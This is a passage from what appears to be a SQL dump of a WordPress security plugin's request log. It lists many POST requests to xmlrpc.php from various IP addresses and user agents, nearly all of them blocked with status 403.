Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile Safari\\/537.36\"}','5GOAvemaE3slCV7k9nS6TNyK',0,1681607136.0958,584,'','POST',403,0,515,0,1,'',0),('75.119.135.6',1266124550,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile Safari\\/537.36\"}','vEAWKiCzP9OGLy20s5Do87nQ',0,1681607139.1744,585,'','POST',403,0,515,0,1,'',0),('146.70.115.139',2454090635,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','CIYbHOTFQEji3wanJ9ocfVzN',0,1681608704.1338,713,'','POST',403,0,515,0,1,'',0),('116.202.235.13',1959455501,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','C7qgIxdblO6MFpScNBJTaEsu',0,1681609468.9822,2768,'','POST',403,0,515,0,1,'',0),('35.214.190.212',601276116,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','agWQPsF7K6BbGfDA284xjRup',0,1681609469.4793,2963,'','POST',403,0,515,0,1,'',0),('62.102.148.158',1046910110,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','IaXJk8BSLTeF6YZs3im7jM2n',0,1681610095.4271,3660,'','POST',403,0,515,0,1,'',0),('103.101.161.81',1734713681,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','oJ7yZrPw3bQBM41cdtDGXvps',0,1681610249.7230,948,'','POST',403,0,515,0,1,'',0),('144.126.132.168',2424210600,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','nWurEpwczibalgAY75K0eUH4',0,1681610250.2434,851,'','POST',403,0,515,0,1,'',0),('103.101.161.81',1734713681,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','cCV2kHbryThNovBPEZszXYgU',0,1681610258.2808,578,'','POST',403,0,515,0,1,'',0),('82.223.115.237',1390375917,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','cxUmRa8PDq4QWzFo9KN52eSs',0,1681610261.5993,552,'','POST',403,0,515,0,1,'',0),('47.243.171.230',804498406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','WjU7Cm8K302wZo5EdTRcynib',0,1681610266.7888,564,'','POST',403,0,515,0,1,'',0),('212.90.148.14',3562705934,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','mZzPAErQFbtXO6iMRvKya9nk',0,1681610273.1562,2190,'','POST',403,0,515,0,1,'',0),('208.109.61.155',3496820123,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','h4X0bveynUSRzQx8AirTV3DF',0,1681610273.7761,2074,'','POST',403,0,515,0,1,'',0),('101.0.73.122',1694517626,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','Du5qsYt7l4OGEhIKAicnrQ3V',0,1681610280.7772,590,'','POST',403,0,515,0,1,'',0),('134.122.120.71',2256173127,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','YxBFjMDt3GC7lsfLg0k9coR1',0,1681610288.2402,628,'','POST',403,0,515,0,1,'',0),('141.98.102.187',2372036283,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','vmq5Hl9ZrApDeT24Caxfij0Y',0,1681610300.8686,601,'','POST',403,0,515,0,1,'',0),('212.90.148.14',3562705934,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','n8s5uWISGgOH3TKNMcleYd2B',0,1681611008.2220,4440,'','POST',403,0,515,0,1,'',0),('66.42.49.228',1110061540,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','sGZMmaUBjStd08vP9cOJFAq7',0,1681611012.2660,869,'','POST',403,0,515,0,1,'',0),('52.69.122.222',876968670,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','CD3TJ4qPvwlXZHzfshgaYN67',0,1681611014.3160,556,'','POST',403,0,515,0,1,'',0),('149.129.227.62',2508317502,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','E0KviA7ouM468DIB2qTY5bH9',0,1681611016.8202,618,'','POST',403,0,515,0,1,'',0),('139.59.104.143',2335926415,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','Bt2vHsdWLwPurG7Q58X4jJCn',0,1681611024.2078,574,'','POST',403,0,515,0,1,'',0),('5.255.98.122',100622970,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','dloHyDx9Eams8vKwL4RfnZe7',0,1681611025.2786,561,'','POST',403,0,515,0,1,'',0),('103.101.161.81',1734713681,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','kTxc7Da5e9qrYlh1KGFOZoJs',0,1681611027.5360,399,'','POST',404,0,515,0,1,'',0),('82.196.8.42',1388578858,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','C460uV95nZaUe7IcMA3dTWFq',0,1681611031.0984,597,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','ZaSEA86VvgfRi1oqHlXPBeWQ',0,1681611039.9073,588,'','POST',403,0,515,0,1,'',0),('202.61.232.109',3393054829,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','p2AxzvQ9F8dcXwT6GHSMBrCR',0,1681611051.5987,586,'','POST',403,0,515,0,1,'',0),('162.214.107.60',2731961148,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','IW7Xav1LhHKwFc3ZVi5N4bG0',0,1681611055.4615,1618,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','fLWAYJhD1zMCNFvP9tpkQZIE',0,1681614475.2966,2817,'','POST',403,0,515,0,1,'',0),('139.59.104.143',2335926415,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0; rv:34.0) Gecko\\/20100101 Firefox\\/34.0\"}','mLQbZJOn5dxUy90GRu8qMFWC',0,1681614476.9270,1470,'','POST',403,0,515,0,1,'',0),('103.101.161.81',1734713681,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','OwI6ibnGy0uhLjMDtZ7A1xfl',0,1681614484.3554,727,'','POST',403,0,515,0,1,'',0),('139.162.58.251',2342664955,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','OIy2CYpQnc1t4RzPB7gsULH6',0,1681614485.9806,743,'','POST',403,0,515,0,1,'',0),('208.109.61.155',3496820123,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','ZIrwueVBdCgLKxHUQJE6qF8b',0,1681614489.8976,808,'','POST',403,0,515,0,1,'',0),('35.214.190.212',601276116,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','HkATSedy6ci4potfw9gmlnPa',0,1681614491.3268,707,'','POST',403,0,515,0,1,'',0),('81.169.144.135',1370067079,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko\\/20100101 Firefox\\/79.0\"}','TPnh6ieB9pmyNrl8SbaQc7ZD',0,1681614493.7331,623,'','POST',403,0,515,0,1,'',0),('199.59.90.4',3342555652,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','CatRSM48WdKwzHNsFXpxImOq',0,1681614498.8681,599,'','POST',403,0,515,0,1,'',0),('103.101.161.81',1734713681,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\\/20100101 Firefox\\/40.1\"}','LXrxvC567dgOzqMZsSAfFoDI',0,1681614502.7167,707,'','POST',403,0,515,0,1,'',0),('178.62.105.205',2990434765,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','TWyi1BF8DeK5Lh3R0uEOmCka',0,1681614504.7585,655,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','6AE7MyfoYBWuD0XiSq58Vh31',0,1681614510.9774,2184,'','POST',403,0,515,0,1,'',0),('40.64.56.120',675297400,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','MJ49l1SdKCcUr7GOjFnQy0i2',0,1681614514.7040,748,'','POST',403,0,515,0,1,'',0),('37.120.210.219',628675291,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','vugfsnrm7y6VdBRqLKe5ho0Z',0,1681615835.7642,3526,'','POST',403,0,515,0,1,'',0),('194.187.251.91',3267099483,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','xzkd6UIvT81S0sPbH7ZWgiQK',0,1681617637.1042,1545,'','POST',403,0,515,0,1,'',0),('184.75.221.211',3091979731,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','daETj8Yytme3XC015ugGkSpl',0,1681617679.8430,579,'','POST',403,0,515,0,1,'',0),('198.71.235.55',3326602039,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','rnZ4WYxVq2paNlSKXtgGyHeL',0,1681618239.5622,3811,'','POST',403,0,515,0,1,'',0),('157.7.190.240',2634530544,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','08AsqEZN7HIVu6tFciL9o5vp',0,1681618241.9931,1533,'','POST',403,0,515,0,1,'',0),('82.65.248.18',1380055058,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','42kouGlqKUJbcTrDp6ndwaWI',0,1681618244.8058,560,'','POST',403,0,515,0,1,'',0),('59.106.222.53',996859445,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','pg7CfL8tkJrv0e24EwZnTYoU',0,1681618251.4128,585,'','POST',403,0,515,0,1,'',0),('47.242.62.161',804404897,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.141 Safari\\/537.36\"}','r7d6K4UwP2CfB1AzNbjVDSxW',0,1681618259.2642,570,'','POST',403,0,515,0,1,'',0),('31.172.80.82',531386450,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','zf8odkqvC4GReDIlphbAwnjB',0,1681618262.0163,1332,'','POST',403,0,515,0,1,'',0),('51.132.254.35',864353827,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','GYLZN0XKlAROF6IucsUkCryW',0,1681618263.9807,1279,'','POST',403,0,515,0,1,'',0),('103.42.56.253',1730820349,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','DMZPsoIaLXiekthEbxcVglWN',0,1681618274.6979,585,'','POST',403,0,515,0,1,'',0),('144.76.74.227',2420919011,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','KSPU9QLoTpWvngtNlwrIHfV6',0,1681618283.5915,582,'','POST',403,0,515,0,1,'',0),('34.87.13.139',576130443,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','v1flriHnZ9TSItL6QgUNxy0E',0,1681618284.3038,628,'','POST',403,0,515,0,1,'',0),('103.221.223.238',1742594030,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','y4YkjVXh2CL1v0dRoqiQFNxT',0,1681618288.2158,715,'','POST',403,0,515,0,1,'',0),('103.42.56.253',1730820349,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','EilQuDofJVdTGP7Mwc4eq9rv',0,1681618307.8293,591,'','POST',403,0,515,0,1,'',0),('141.98.102.235',2372036331,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','gnVRmt0WF5yXiYdoa24lQ6w8',0,1681618903.3328,3640,'','POST',403,0,515,0,1,'',0),('91.225.138.200',1541507784,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','flKwxRVS0y1pBUbWsM6YQ7za',0,1681620833.2095,2845,'','POST',403,0,515,0,1,'',0),('41.72.149.125',692622717,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','HETpaDnZ5eQ0NJ3YcgdIMl2v',0,1681620842.7540,696,'','POST',403,0,515,0,1,'',0),('103.171.90.148',1739283092,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','Sz5C1yJgxREf2oWjr39qDtFp',0,1681620843.5490,618,'','POST',403,0,515,0,1,'',0),('54.36.174.113',908373617,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','qW2seCTcukPpIZYliORvBQt8',0,1681620848.7156,648,'','POST',403,0,515,0,1,'',0),('199.59.90.4',3342555652,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','oP1B3bT6A4RVSnjmvc5FJuka',0,1681620853.9926,591,'','POST',403,0,515,0,1,'',0),('139.162.58.251',2342664955,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','8GjRI29sO0pKYSxqeaTiPJuL',0,1681620857.9505,562,'','POST',403,0,515,0,1,'',0),('149.248.50.72',2516070984,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','tjlMmEuYTQbpLJO9hyBnzI6V',0,1681620865.1937,584,'','POST',403,0,515,0,1,'',0),('91.225.138.200',1541507784,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','TfDbldzoghBQkt9V85Ju6OW2',0,1681620868.6223,587,'','POST',403,0,515,0,1,'',0),('219.94.129.200',3680403912,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','P2mztnGuTVHOeQ73M9JNBvrc',0,1681620871.0433,574,'','POST',403,0,515,0,1,'',0),('185.110.66.2',3111010818,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','YfcAB8ObCtSLZ7MpjidEGgxl',0,1681620880.6695,563,'','POST',403,0,515,0,1,'',0),('82.102.27.163',1382423459,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','bVmcNYA71jxPpvi68Ek3aQUf',0,1681623451.0234,3949,'','POST',403,0,515,0,1,'',0),('43.155.103.11',731604747,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','tLxwlFb1OVCu7BHq9KXsGvk5',0,1681625125.6324,767,'','POST',403,0,515,0,1,'',0),('92.205.53.115',1556952435,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','ApgBnCServDOQVEdoiJ4XMxm',0,1681625129.3775,630,'','POST',403,0,515,0,1,'',0),('185.2.5.88',3103917400,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','YpqvktEmBxQ23HIMTKRScGu8',0,1681625132.0805,679,'','POST',403,0,515,0,1,'',0),('80.244.168.40',1358211112,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','STcGqOgQBnpIZvk1F5zPY9mx',0,1681625138.9859,601,'','POST',403,0,515,0,1,'',0),('103.146.176.238',1737666798,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','cSmhspe0Z9dYz1ntxAQi5jkM',0,1681625140.2575,592,'','POST',403,0,515,0,1,'',0),('89.201.167.100',1506387812,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','gHmTBJ04SyXlxwi5s6FKvGP9',0,1681625143.7806,570,'','POST',403,0,515,0,1,'',0),('89.201.167.100',1506387812,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','x8WuoYty3P61qpHI0bgARBNl',0,1681625148.7972,2354,'','POST',403,0,515,0,1,'',0),('103.159.84.218',1738495194,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','MVnvkJPiNRzd3bUxsl4t5K8W',0,1681625148.5334,2623,'','POST',403,0,515,0,1,'',0),('66.94.107.15',1113484047,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','9OPClNVcYAzvoSqMTX7dErJ1',0,1681625155.7130,975,'','POST',403,0,515,0,1,'',0),('185.2.5.88',3103917400,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','ByZw4260leNvE7VrMULHgSnD',0,1681625156.2472,900,'','POST',403,0,515,0,1,'',0),('103.231.91.59',1743215419,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','LsGt3OU6A2ajMNBD7IX4FyHk',0,1681626407.3320,4535,'','POST',403,0,515,0,1,'',0),('104.207.254.152',1758461592,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','vJfWYIKQp35CiogrEDOGcVak',0,1681627388.6079,4178,'','POST',403,0,515,0,1,'',0),('83.217.71.17',1406748433,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','HnyEO5f9QNxmXhslokIBzLpM',0,1681627398.3217,590,'','POST',403,0,515,0,1,'',0),('142.93.230.17',2388518417,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','a0jAcdxq2QO8eytMrWGoCBFT',0,1681627401.9805,560,'','POST',403,0,515,0,1,'',0),('47.243.171.230',804498406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','k2McqayjWUw1NbILzt07E5YP',0,1681627410.7792,589,'','POST',403,0,515,0,1,'',0),('5.9.59.22',84491030,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','CDwnJABZvfQs9zS7WUt5iPMg',0,1681627414.0062,731,'','POST',403,0,515,0,1,'',0),('213.159.7.167',3583969191,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 